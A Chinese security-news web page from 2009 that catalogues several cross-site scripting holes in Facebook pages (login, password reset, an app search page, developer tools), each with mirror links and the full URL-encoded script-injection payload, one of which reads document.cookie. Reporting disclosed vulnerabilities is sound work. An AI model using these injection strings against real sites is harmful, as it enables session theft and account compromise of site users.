pc捍卫者
 当前位置 → pc捍卫者pc网络安全 → 浏览正文
网络安全研究:FacebookXSS漏洞分析
作者:本站综合    来源:www.pchwz.com    更新时间:2009年02月07日


问题页面的镜像:http://www.xssed.com/mirror/53885/
攻击性POST:
email=biz%22%3E%3Cs cript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fs cript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

3号XSS漏洞:

这是Facebook的Reset Password页面近期再次出现危险的跨站点脚本攻击安全漏洞。恶意用户可以网其中诸如代码并窃取数以百万计的Facebook用户的敏感个人信息。但愿这个漏洞能够得到迅速修复,好在以前他们的反应还是很迅速的。

所在位置:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cs cript%3Ealert(1)%3C/s cript%3E%22%3E%3Cs cript%3Ealert(document.cookie)%3C/s cript%3E

问题页面的镜像:
http://www.xssed.com/mirror/55951/

4号XSS漏洞

所在位置及攻击字符串:
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cs cript%3Ealert(%22DaiMon%22)%3C/s cript%3E
问题页面的镜像:http://www.xssed.com/mirror/55268/

5号XSS漏洞:

所在位置:http://developers.facebook.com/tools.php?fbml
问题页面的镜像:http://www.xssed.com/mirror/55392/
攻击性POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cs cript%3Ealert%281337%29%3C%2Fs cript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! :) ;)

上一页
本文共 2 页,第  [1]  [2]  页

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点

上一篇:个人电脑安全防黑客攻击之独孤九剑      下一篇专家介绍云计算环境的安全策略
Tags:
 
 
>> 推荐文章
·网络安全之12360崩了!
·最强手机芯片骁龙865跑分
·人民日报35岁现象怎么解析?
·卫星传输数据到iPhone的办法
·苹果手机销量暴降35%!
·红米K30普通版5G版,怎样选择K
·预计2025年5G用户渗透率为48
·红米K30真阉割版5G手机吗?
·Android 10与 iOS 1
·高通骁龙 865详细性能参数
·安卓的这个漏洞一直都还在
·苹果明年iPhone中或支持5G
·问题:5G网络什么时候才能普及?
·“携号转网”能否随心所欲?
·英特尔处理器缺货转投AMD
·国产OLED在市场的地位逐渐凸显
·交通安全日注重生命安全
·《携号转网服务管理规定》今起施行
>> 赞助商链接
|pc捍卫者|捍卫你地盘|唯尚技术|||版权声明|关于我们
本站文章除原创者其余源自网络,如有侵权请联系站长,将于24小时内删除